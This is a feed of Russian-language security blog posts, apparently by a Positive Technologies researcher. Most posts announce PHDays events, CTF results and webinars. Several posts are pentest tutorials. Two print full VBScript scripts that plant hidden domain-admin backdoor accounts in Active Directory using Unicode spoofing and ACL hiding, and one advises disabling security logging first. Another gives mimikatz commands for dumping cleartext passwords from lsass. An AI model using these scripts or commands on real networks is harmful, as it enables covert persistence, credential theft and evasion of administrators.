В тему ИБ

Positive Hack Days 2012

noreply@blogger.com (Dmitry Evteev) — Mon, 14 May 2012 03:17:17 PDT

Сегодня ~~как-то неожиданно~~ запланированно прошла регистрация на форум Positive Hack Days 2012. Регистрация продлилась всего 8 минут и затем была закрыта, т.к. количество желающих посетить мероприятие превысило вместительность площадки, на которой пройдет форум. Если вы не успели зарегистрироваться, не расстраивайтесь! Будет организована трансляция всех секций форума на двух языках. Кроме того, вы можете участвовать в online-конкурсах, которые будут проходить в дни проведения форума. Присоединяйтесь! http://phdays.ru/registration/

PHDays 2012

noreply@blogger.com (Dmitry Evteev) — Tue, 08 May 2012 06:19:46 PDT

Мы запустились!11

Информация о форуме - http://phdays.ru/about/
Нас поддерживают - http://phdays.ru/registration/everywhere/
Программа форума - http://phdays.ru/program/
Конкурсная программа - http://phdays.ru/program/contests/ (и сейчас уже проходят два конкурса - "Взорвем городишку" и "Хакеры против форензики"; прими участие и получи инвайт на форум!). Отдельно хочется выделить конкурс "Hack2own", предварительный бюджет которого составляет 600.000 рублей. Информация о самом зрелищном конкурсе PHDays CTF 2012 - http://phdays.ru/ctf/

Вся информация также представлена на английском языке - http://phdays.com/

Software People 2012: Собираем команду хакеров

noreply@blogger.com (Dmitry Evteev) — Mon, 16 Apr 2012 02:09:28 PDT

На днях в очередной раз побывал в здании Digital October и выступил в формате мероприятия Software People 2012. Презентация с выступления приведена ниже.

Собираем команду хакеров

View more PowerPoint from Dmitry Evteev

PS. выкладываю с большим опозданием т.к. slideshare.net неожиданно глючил на той неделе...

PHDAYS 2012: начало

noreply@blogger.com (Dmitry Evteev) — Fri, 06 Apr 2012 01:10:03 PDT

До международного форума по практической безопасности Positive Hack Days 2012 (#phdays) осталось менее двух месяцев. Программа в целом сформирована и она апупенна! Направления тематических конкурсов до, после и во время мероприятия (включая мега CTF 2012) проработаны и в настоящее время идет их активная разработка. На следующей неделе планируется запуск нового сайта форума. Следите за новостями.

З.Ы. И да, это мой первый пост с андроида. "Все, когда-то бывает в первый раз" (с)

Neúron Хакспейс: итоги встречи

noreply@blogger.com (Dmitry Evteev) — Tue, 03 Apr 2012 15:13:20 PDT

Интересно, но как-то так получилось, что по материалам прошлогоднего PHDays мы встречались на хакспейсе за два месяца до запланированного форума в этом году. И! ~~Неожиданно~~ Ожидаемо собрали в одном месте довольно много технически грамотных людей, которым действительно было интересно то, что мы рассказывали. Это, несомненно, очень приятно.

Я не буду слишком многословен про проведенный воркшоп, скажу лишь, что все было пупенно! А наливайка, ДА, наливайка удалась :)

И вот еще что. Компания Positive Technologies стала техническим спонсором площадки Neúron Хакспейс:

По просьбе участников воркшопа, выкладываю все презентации на сайт SlideShare мероприятия PHDays:

PHDays CTF 2011 Quals/Afterparty: как это было

View more PowerPoint from Dmitry Evteev

Юрий Гольцев - Сервис PLWWW

View more PowerPoint from Positive Hack Days

Сергей Щербель - Атаки XML eXternal Entity

View more PowerPoint from Positive Hack Days

Артем Чайкин - JAVA+GWT

View more PowerPoint from Positive Hack Days

Глеб Грицай - Forensics

View more PowerPoint from Positive Hack Days

Александр Зайцев - Port Knocking, short notes

View more PowerPoint from Positive Hack Days

Юрий Гольцев - Сервис Collider

View more PowerPoint from Positive Hack Days

Спасибо всем, кто пришел и поддержал предложенный нами формат неформальной встречи! До новых встреч на хакспейсе!

Воркшоп по итогам PHDays CTF 2011 на Хакспейсе Neúron

noreply@blogger.com (Dmitry Evteev) — Tue, 27 Mar 2012 23:55:37 PDT

31 марта 2012 года в хакспейсе Neuron пройдет воркшоп, посвященный итогам PHDays CTF Afterparty.

Формат встречи

На площадке будет развернута виртуальная сеть, аналогичная той, что использовалась на отборочных соревнованиях CTF Afterparty 2011. Вы сможете не только выяснить секреты создания дьявольски сложных заданий, но и порешать их по ходу действия, поэтому не забудьте захватить ноутбук.

Другим поводом посетить хакспейс может стать желание неформально встретиться и потрещать на другие, не связанные CTF-афтепати темами.

Время проведения воркшопа: с 11 до 18 ч.

Кто?

Докладчики: мну, Юрий Гольцев, Глеб Грицай, Александр Зайцев, Сергей Щербель, Артем Чайкин.

Где и как?

Вход совершенно свободный, но требует обязательной регистрации на сайте хакспейса или по адресу электронной почты - seminars@ptsecurity.ru.

Как добраться?

1. м. Воробьёвы горы, последний вагон из центра, выход на улицу направо.
2. По зелёной велосипедной дорожке пока не окажетесь почти напротив здания Академии Наук.
3. Когда увидите слева вывеску «Автомойка», вы почти пришли.
4. Пропустите один шлагбаум и мимо второго шлагбаума зайдите во двор.
5. Справа от вас будет металлическая дверь и цифра 17 (номер корпуса) рядом с ней.
6. Встаньте около двери и позвоните организатору мероприятия или дождитесь, пока дверь откроется, и проходите.
7. Внутри здания следуйте по белым указателям «Neúron». Мансарда офис 444.

Ждем вас!

100% Virus Free Podcast #38

noreply@blogger.com (Dmitry Evteev) — Mon, 26 Mar 2012 12:07:46 PDT

Специальный выпуск, посвященный конференции Positive Hack Days 2012;
hack the planet :)

Скачать mp3 файл

MS12-020: exploit available?

noreply@blogger.com (Dmitry Evteev) — Thu, 15 Mar 2012 00:17:57 PDT

Появилось первое упоминание про рабочий эксплоит к уязвимости MS12-020:

Замечен по адресу: http://www.forgeting.com/archives/601.html
Источник: http://www.securitylab.ru/blog/personal/tecklord/21197.php

Подтверждения или опровержения информации о рабочем сплоетсе пока нет. Если кто-то станет счастливым обладателем этого чуда, просьба стукнуться ко мне ;)

К слову, о движухе в направлении разработки эксплоита под MS12-020. Желающие поднять 1451$ ( :D, прим. полет мысли) могут присоединиться к его разработке в рамках этого проекта - http://gun.io/open/48/metasploit-module-for-cve-2012-002

MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution

noreply@blogger.com (Dmitry Evteev) — Wed, 14 Mar 2012 14:24:06 PDT

Как обычно во второй вторник месяца компания Microsoft выпустила пачку заплаток к линейке своих продуктов. Из всего списка бюллетеней по безопасности одной уязвимости, а это - MS12-020, был присвоен статус критической баги. "Обновление устраняет две обнаруженные уязвимости в протоколе удаленного рабочего стола (RDP). Наиболее серьезная из этих уязвимостей делает возможным удаленное выполнение кода, если злоумышленник отправляет уязвимой системе последовательность специально созданных пакетов RDP", сообщается на соответствующей странице.

В очередной раз Windows (а вместе с ней и весь мир) в опасности или Microsoft просто шутит? Эксперты прогнозируют, что малварь, эксплуатирующая уязвимость ms12-020 появится менее чем через 30 дней. С другой стороны, парни, которые уже сделали бинарный анализ выпущенного патча находятся в недоумении, пологая, что дальше отказа в обслуживании дело не дойдет [1, 2]. Появится-ли новый RCE для серьезного покрытия версий винды вновь покажет время. Ждем-с :)

Вебинар: Тестирование на проникновение в сетях Microsoft

noreply@blogger.com (Dmitry Evteev) — Mon, 12 Mar 2012 12:45:19 PDT

В четверг на этой неделе (15.03) проведу вебинар по теме реализации угроз в сетях Microsoft. Буду делиться практическим опытом :) Данную презентацию я уже рассказывал не так давно на 8-й встрече Defcon Russia Group, которая проходила в Москве. Но по причине двух последних событий [1, 2], немного изменил содержимое в имеющейся презентации.

Тестирование на проникновение в сетях Microsoft (v.2)

View more PowerPoint from Dmitry Evteev

Для бесплатного участия в вебинаре необходимо зарегистрироваться по этой ссылке.

Backdoor в Active Directory III

noreply@blogger.com (Dmitry Evteev) — Sat, 10 Mar 2012 12:32:39 PST

Продолжая тему из серии "прячемся в каталоге MS LDAP" [1,2] нашел еще один замечательный способ скрыть свое присутствие от бдительного взора администратора домена. Речь идет про объект типа "msPKI-Key-Recovery-Agent", который визуально выглядит, как системная организационная единица и ни как не выдает себя при не целевом поиске (например, через стандартные средства поиска по каталогу). Приведенный ниже сценарий позволяет создать "скрытого" пользователя, как показано на картинке.

В совокупности с идеями, предлагаемыми ранее, данный подход видится мне довольно перспективным.

On Error Resume Next username = "PT" password = "P@ssw0rd" userDN = "cn=Program Data" joinGroupDN = "cn=Terminal Server License Servers, cn=Builtin" joinGroup = "BUILTIN\Terminal Server License Servers" adminsGroup = "CN=Domain Admins,CN=Users" Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN Set objSysInfo = CreateObject("ADSystemInfo") strUserDN = objSysInfo.userName Set objUser = GetObject("LDAP://" & strUserDN) Set objRoot = GetObject("LDAP://rootDSE") Set objContainer = GetObject("LDAP://" & userDN & "," & objRoot.Get("defaultNamingContext")) Set objUserCreate = objContainer.Create("msPKI-Key-Recovery-Agent", "cn=Configuration") objUserCreate.Put "sAMAccountName", username objUserCreate.SetInfo On Error Resume Next objUserCreate.SetPassword password objUserCreate.Put "userAccountControl", 66048 objUserCreate.Put "description", "Default location for configuration application data." objUserCreate.SetInfo On Error Resume Next GroupAddAce joinGroupDN,username GroupAddAce adminsGroup,joinGroup GroupAddAce "CN=AdminSDHolder,CN=System",joinGroup Function GroupAddAce(toGroup,forGroup) Dim objSdUtil, objSD, objDACL, objAce Set objGroup = GetObject ("LDAP://" & toGroup & "," & objRoot.Get("defaultNamingContext")) Set objSdUtil = GetObject(objGroup.ADsPath) Set objSD = objSdUtil.Get("ntSecurityDescriptor") Set objDACL = objSD.DiscretionaryACL Set objAce = CreateObject("AccessControlEntry") objAce.Trustee = forGroup objAce.AceFlags = 0 objAce.AceType = 5 objAce.AccessMask = 32 objAce.Flags = 1 objAce.ObjectType = "{BF9679C0-0DE6-11D0-A285-00AA003049E2}" objDacl.AddAce objAce objSD.DiscretionaryAcl = objDacl objSDUtil.Put "ntSecurityDescriptor", Array(objSD) objSDUtil.SetInfo End Function

Windows Credentials Editor (WCE) 1.3beta released

noreply@blogger.com (Dmitry Evteev) — Sat, 10 Mar 2012 06:36:36 PST

Самые вкусные "плюшки" в сборке под названием mimikatz в части дерганья открытых паролей в операционной системе под управлением Windows на днях были портированы в "швейцарский нож", известный под названием Windows Credentials Editor:

Прямая ссылка для скачивания: WCE v1.3beta (32-bit) (download)

Positive Technologies has successfully passed the PCI SSC ASV

noreply@blogger.com (Dmitry Evteev) — Tue, 06 Mar 2012 02:51:54 PST

Компания Positive Technologies теперь тоже входит в элитный список вендоров, которые могут проводить PCI DSS ASV сканирования. И даже больше! Positive Technologies MaxPatrol полностью поддерживает формат ASV. О чем, собственно, я и буду хвастаться на соответствующем вебинаре в июне этого года.

UN.org, Skype.com, and Oracle.com Hacked by D35m0nd142

noreply@blogger.com (Dmitry Evteev) — Wed, 29 Feb 2012 13:45:11 PST

Что-то давно я не писал про SQL-инъекции и инциденты, связанные с ними. И потому не смог отказать себе в удовольствии посмаковать последние события, опубликованные на news.softpedia.com. Шутка ли, что хакер под псевдонимом D35m0nd142, вооружившись последней версией Acunetix WVS и средством для автоматизации проведения атаки через blind SQLi (Havij?) сумел натворить много дел [1] на столь известных ресурсах, как например Oracle.com и Skype.com:

Вот такая она информационная ~~защищенность~~ безопасность столь интересных ресурсов. На фоне этого инцидента вспоминается разбор полетов Anonymous, опубликованный на днях компанией Imperva [2]. Слишком уж он напоминает сценарий нашего героя. С другой стороны, "атаки, они такие атаки"...

(0day) Пароли в открытом виде или секреты LSA

noreply@blogger.com (Dmitry Evteev) — Mon, 20 Feb 2012 11:34:23 PST

Не успел я сконсолидировать типовые методы пост-эксплуатации на платформе Windows в предыдущем посте, как (неожиданно и в тот же день) Александр Зайцев нарыл в сети новую, куда более интересную тему. Речь идет про опубликованный на днях французским исследователем "швейцарский нож" под названием mimikatz. Инструмент, помимо аналогичного функционала, поддерживаемого Windows Credentials Editor, позволяет выдергивать креды залогиневшегося пользователя в системе открытым текстом! Атака реализуется следующей магией:

mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

Подобное чудо связано с использованием поставщика безопасности wdigest, который с целью поддержки SSO хранит пароль в памяти открытым текстом (кто бы мог подумать!). Стоит ли говорить какой выхлоп для атакующего играет подобный недостаток :) К слову, парни уже прикручивают это чудо к MSF - http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

В качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.

DRG 8: Тестирование на проникновение в сетях Microsoft

noreply@blogger.com (Dmitry Evteev) — Thu, 16 Feb 2012 08:02:03 PST

Презентация с сегодняшней встречи на Defcon Russia Group 8 -

Тестирование на проникновение в сетях Microsoft

View more PowerPoint from Dmitry Evteev

PHDays CTF 2011 Quals/Afterparty: как это было

noreply@blogger.com (Dmitry Evteev) — Thu, 16 Feb 2012 08:06:56 PST

Презентация с сегодняшнего вебинара представлена ниже.

PHDays CTF 2011 Quals/Afterparty: как это было

View more PowerPoint from Dmitry Evteev

Обещанный образ виртуальной машины и все необходимые материалы доступны для скачивания по следующим ссылкам:

http://phdays.ru/files/PHD-HQ2011.part1.rar
http://phdays.ru/files/PHD-HQ2011.part2.rar
http://phdays.ru/files/PHD-HQ2011-additionally.ZIP

Контрольные суммы:

6aa574211826ad4f4fa518769a067ed6 *PHD-HQ2011.part1.rar
27b3845d190ea5dabe371d8f1c5ab75d *PHD-HQ2011.part2.rar
2ecf9408e864ff90820cd7ab8390559c *PHD-HQ2011-additionally.ZIP

Инфофорум 2012: материалы мастер-класса

noreply@blogger.com (Dmitry Evteev) — Tue, 07 Feb 2012 04:02:27 PST

Провел сегодня мастер-класс на Инфофоруме 2012 (да да, прям в здании Правительства РФ)). Рассказывал "сказки", показывал мультики :)

Как взламывают сети государственных учреждений

View more PowerPoint from Dmitry Evteev

Доигрался или звезда в шоке)

noreply@blogger.com (Dmitry Evteev) — Fri, 27 Jan 2012 01:11:19 PST

NO COMMENTS ^_^

Вебинары Positive Technologies

noreply@blogger.com (Dmitry Evteev) — Thu, 26 Jan 2012 15:33:26 PST

Опубликовано расписание образовательной программы "Практическая безопасность" на первое полугодие 2012 года. Стоит отметить, что запланированный список тем не является окончательным и со временем будет пополняться. Разумеется, все самые "вкусные" темы припасены на международный форум Positive Hack Days :)

А пока счет 7/4 и MaxPatrol заметно лидирует))

Как MaxPatrol ищет 0day?

noreply@blogger.com (Dmitry Evteev) — Wed, 25 Jan 2012 07:47:09 PST

Легко! :) http://www.zerodayinitiative.com/advisories/ZDI-12-015/

Backdoor в Active Directory следующего поколения

noreply@blogger.com (Dmitry Evteev) — Tue, 10 Jan 2012 00:33:33 PST

В начале прошлого года мною уже поднималась тема пост-эксплуатации в домене Microsoft Active Directory. В предложенном ранее подходе рассматривался вариант ориентированный больше на случай утери административных привилегий, нежели их непосредственное использование. При этом само действо по возврату этих привилегий подразумевало "шумные" события и визуально палевные манипуляции в каталоге. Другими словами, для того, чтобы вернуть себе административные привилегии в домене, требовалось стать участником соответствующей группы безопасности, например, группы "Domain Admins".

Надо сказать, что администраторы очень волнуются, когда неожиданно осознают присутствие в своей системе кого-то еще. Некоторые из них бросаются всеми силами обрабатывать инцидент безопасности. Порой, самыми непредсказуемыми действиями ;))

Теперь представьте, как себя может повести администратор Active Directory в крупной компании, при виде незнакомого идентификатора в группе безопасности "Enterprise Admins"? В случае если кто-то залился не понарошку, тогда озабоченность администратора полностью оправдана. Но в случае недостаточного противодействия при проведении пентеста, шибко волноваться явно не стоит (ровно, как лишать парней точек входа и добытых потом и кровью привилегий).

Я долго размышлял над тем, как, не пугая администраторов, свободно пользоваться достигнутыми привилегиями в ходе проведения тестирования на проникновение (особенно на фоне агрессивного противодействия со стороны администраторов на последних работах). С одной стороны, при проведении пентеста мы сильно ограничены в возможностях. Например, правило по минимизации воздействия на объект исследования – это как само собой разумеющееся. Поэтому наплодить и раскидать бэкдоров по захваченной сети мы попросту не можем. С другой стороны, есть совершенно понятные цели, к которым требуется прийти до того момента, как радостный администратор заметит несанкционированную активность и выдернет шнур из розетки.

Так как же можно оставаться незамеченным в сетях Microsoft?

Первое, что приходит в голову - использовать учетную запись администратора. Доступ легитимный, поэтому он не должен привлекать к себе особое внимание. Но, как показывает практика, не всегда удается получить пароль администратора в открытом виде. В этих случаях на помощь спешит атака, известная под названием Pass-the-Hash. Было бы почти все замечательно (почти, потому как Pass-the-Hash сужает возможности по развитию атаки, например, нельзя воспользоваться протоколом удаленного управления RDP), но в серьезных компаниях администраторы потихоньку переходят на смарт-карты, что не позволяет использовать атаки, основанные на недостатках протокола NTLM. Хорошо, но есть же еще возможность использования токена авторизованного пользователя (eq incognito) и/или билета Kerberos (eq WCE). Так-то оно конечно так, но на практике Kerberos не керберос и токен не токен:( Доступный инструментарий по проведению данных видов атак, к сожалению, откровенно лажает. Кроме того, в обоих случаях, ровно как с атакой Pass-the-Hash, действия атакующего весьма ограничены используемыми протоколами, поддерживающими SSO в домене.

Таким образом, самый привлекательный путь - это использование привилегий, если уж не существующего, так созданного идентификатора администратора домена с известным паролем...

Как при этом не нарваться на бдительный глаз администратора домена?

Во-первых, внесение изменений в каталог Active Directory порождает соответствующие события, о которых администратору лучше не знать. Поэтому перед заливкой в домен (разумеется, только при проведении тестирования на проникновение и после согласования сего действа с ответственным лицом на стороне заказчика) рекомендуется отключить ведение событий безопасности на контролерах домена посредством соответствующего GPO. Напомню, что по умолчанию время фонового обновления групповых политик для контроллеров домена составляет 15 минут.

Во-вторых, никто не мешает создать визуально идентичную учетную запись, аналогичную существующему администратору домена. Для этого, например, могут использоваться символы юникода (!). Далее, созданному пользователю выставляется атрибут "showInAdvancedViewOnly" в значение "TRUE", что позволит скрыть объект в стандартном режиме просмотра оснастки "Управления пользователями и компьютерами" (dsa.msc). После чего, осталось поместить этого пользователя в одну из административных групп, свободную от реального администратора домена (прим., как правило, администраторы любят воткнуть свою учетную запись во все мыслимые и не мыслимые административные группы; например, оставим администратора в группе "Enterprise Admins", а клона поместим в группу "Domain Admins").

Но я думаю, что многие из читателей уже засомневалась в успехе компании. И они правы! Этот способ никуда не годится, т.к. в нем присутствуют два существенных недостатка:
1. Созданный идентификатор пользователя виден в каталоге "вооруженным глазом".
2. При поиске пользователей в домене, учетная запись администратора начинает двоиться.

Как можно решить эти проблемы?

Казалось бы, самое простое решение на поверхности – правильно настроить права доступа к создаваемому объекту (нашему пользователю). Для этого достаточно группе "Everyone" запретить читать публичную информацию у объекта. И в организационной единице, рядом с реальным администратором Active Directory повиснет "нечто", что как минимум перестанет светиться при поиске пользователей в домене. Однако сказка продлится не более, чем 60 минут:( Дело в том, что по умолчанию каждые 60 минут на контроллере домена, выполняющего роль эмулятора PDC, запускается процесс "SDPROP", который восстанавливает права доступа у ряда объектов Active Directory (в том числе, у всех членов групп администраторов) в соответствии с установленными правами доступа на объект "AdminSDHolder" (http://technet.microsoft.com/en-us/query/ee361593).

К сожалению, отключить указанный механизм безопасности штатными возможностями невозможно. Хак с правами доступа на объект может привести к проблемам с репликацией (а тут уже попахивает какой-то диверсией; при пентесте низя). Перезапись прав доступа на "AdminSDHolder" затронет множество объектов, включая идентификаторы всех администраторов домена. Таким образом, одним из возможных полезных решений, может быть регулярный запуск сценария, который будет исправлять погрешности процесса "SDPROP", но есть и более перспективная альтернатива.

Процесс "SDPROP" восстанавливает права доступа (ACE) только на конкретные привилегированные объекты, при этом права доступа для организационных единиц, в которых содержатся подобные объекты, остаются неизменными. Этим-то как раз и можно воспользоваться! Нам ведь никто не мешает, используя символы юникода, создать аналогичную последовательность организационных единиц, аналогично той последовательности, в которой содержится клонируемый идентификатор. При этом, "правильные" права доступа на вышестоящий контейнер позволят его визуально скрыть от посторонних глаз (разумеется в пределах разумного).

Смысл подобного подхода заключается в том, что у администратора Active Directory не должны появиться нездоровые подозрения на тему того, что доверенная ему система была скомпрометирована. Он по-прежнему остается действующим администратором, разве что членом одной из привилегированных групп является визуально идентичная учетная запись...

И последнее. Для того чтобы созданный клон не дублировался в поиске по каталогу можно воспользоваться, например, символом "202E" (респект Александру Зайцеву за напоминалку). Указанный символ переворачивает строку, расположенную за ним. Таким образом, если мы, к примеру, создаем клон для идентификатора "dmitry.ivanov", создаваемый идентификатор будет иметь вид "202E"+"vonavi.yrtimd". Возможно, такой подход не так удобен для прохождения аутентификации, но от попадания в поиск по каталогу спасает.

С точки зрения журналов безопасности, рассматриваемый подход также позволяет оставаться незамеченным до определенного момента.

Ниже представлен сценарий, который автоматизирует все выше сказанное. Настраиваемые параметры:

strAdminsamAccountName – идентификатор, который требуется с клонировать
strAdminsGroup – привилегированная группа, в которую следует поместить клона
strPassNewUser – задаваемый пароль новому пользователю

On Error Resume Next strAdminsamAccountName = "dmitry.ivanov" strAdminsGroup = "Domain Admins" strPassNewUser = "P@ssw0rd" ' - - - Dim arrContainer(), i Set objRootDSE = GetObject("LDAP://RootDSE") strDomain = objRootDSE.Get("DefaultNamingContext") Set objDomain = GetObject("LDAP://" & strDomain) strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'") If Not IsNull(strAdminsamAccountNameDN) Then Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN) Set objOU = GetObject(objAdmin.parent) i=0 Call EnumOUs(objOU) For j = i-1 To 0 Step -1 if strContainer="" Then strContainer = "OU=" & arrContainer(j) & strContainer primaryContainer = strContainer Else strContainer = "OU=" & arrContainer(j) & "," & strContainer End if Set objOUcreate = objDomain.Create("organizationalUnit", strContainer) objOUcreate.SetInfo Next Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain) Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName)) objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName) objUserCreate.SetInfo On Error Resume Next objUserCreate.SetPassword strPassNewUser objUserCreate.Put "userAccountControl", 66048 objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName) objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn) objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials) objUserCreate.SetInfo On Error Resume Next objUserCreate.Put "showInAdvancedViewOnly", "TRUE" objUserCreate.SetInfo On Error Resume Next NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'") If Not IsNull(strAdminsGroupDN) Then Set objGroup = GetObject("LDAP://" & strAdminsGroupDN) objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN) objGroup.SetInfo objGroup.PutEx 3, "member", Array(NewUserDN) objGroup.SetInfo End If OUAddAce(primaryContainer & "," & strDomain) End If Function SearchDN(str) Set objConnection = CreateObject("ADODB.Connection") objConnection.Provider = "ADsDSOObject" objConnection.Open "Active Directory Provider" Set objCommand = CreateObject("ADODB.Command") Set objCommand.ActiveConnection = objConnection objCommand.Properties("Searchscope") = 2 objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str Set objRecordSet = objCommand.Execute If Not objRecordSet.EOF Then SearchDN = objRecordSet.Fields("distinguishedName").Value End if End Function Sub EnumOUs(objChild) Dim objParent Set objParent = GetObject(objChild.Parent) If (objParent.Class = "organizationalUnit") Then ReDim Preserve arrContainer(i + 1) arrContainer(i) = objChild.ou i=i+1 Call EnumOUs(objParent) Else ReDim Preserve arrContainer(i + 1) arrContainer(i) = objChild.ou & ChrW(128) i=i+1 End If End Sub Function OUAddAce(OU) Dim objSdUtil, objSD, objDACL, objAce Set objOU = GetObject ("LDAP://" & OU) Set objSdUtil = GetObject(objOU.ADsPath) Set objSD = objSdUtil.Get("ntSecurityDescriptor") Set objDACL = objSD.DiscretionaryACL Set objAce = CreateObject("AccessControlEntry") objAce.Trustee = "Everyone" objAce.AceFlags = 2 objAce.AceType = 6 objAce.AccessMask = 16 objAce.Flags = 1 objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}" objDacl.AddAce objAce objSD.DiscretionaryAcl = objDacl objSDUtil.Put "ntSecurityDescriptor", Array(objSD) objSDUtil.SetInfo Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor") intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000 objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor objOU.SetInfo End Function

С новым годом!!!

noreply@blogger.com (Dmitry Evteev) — Tue, 03 Jan 2012 03:30:52 PST

Поздравляю всех с уже наступившим Новым годом 2012! Желаю творческих успехов, удачи в этом году и, разумеется, больше позитива!!! :)

Подведение итогов PHDays CTF AfterParty 2011

noreply@blogger.com (Dmitry Evteev) — Tue, 27 Dec 2011 09:42:08 PST

Завершился двухнедельный конкурс по практической защите информации в рамках PHDays CTF AfterParty 2011. Победителем соревнования стал участник под псевдонимом kyprizel, набравший максимальное число очков из числа возможных. Респект и уважуха!!!

В качестве приза он получит самую новую версию легендарного сканера безопасности XSpider 7.8 и приглашение на международный форум Positive Hack Days 2012 в качестве участника. Остальных победителей, а это участники, которые заняли 2-17 места на 25.12, ждут дипломы и подарки от организатора соревнований – компании Positive Technologies.

Спасибо всем, кто принимал участие в соревнованиях CTF Quals и CTF Afterparty! Я надеюсь участие в этих конкурсах принесло вам массу позитивных эмоций :) А для всех тех, кто не смог принять участие в этих конкурсах, но желал бы проверить свои хакерские способности, регистрация и участие в PHDays CTF AfterParty 2011 продлена до 20-го января 2012 года.

И, разумеется, если Вам есть, что сказать, будем благодарны за объективную критику и общие отзывы об этих конкурсах.

Positive Hack Days CTF 2012 (предварительный список команд)

noreply@blogger.com (Dmitry Evteev) — Tue, 20 Dec 2011 02:25:44 PST

Определился список команд, которые будут приглашены на соревнования по практической безопасности Positive Hack Days CTF 2012. По результатам отборочных испытаний CTF Quals 2011 приглашения получат следующие команды:

- eindbazen, Нидерланды
- leetmore, Россия
- int3pids, Испания
- HackerDom, Россия
- 0daysober, Франция

(почему команда rdot.org не примет участие в PHDays CTF 2012? Это большой большой секрет :))

Личные приглашения получат следующие команды:
- Plaid Parliament of Pwning, США
- BIOS, Индия
- Shell-storm, Франция/Швейцария
- C.o.P, Франция
- IV, Россия
- FluxFingers, Германия
- HNG48, Япония

Призовой фонд CTF 2012 до конца не определен, но предполагается его увеличение;)

P.S. Если найдутся желающие собрать 1-2 запасных команд (на случай форс мажора с основными командами), пишите на почту devteev@ptsecurity.ru.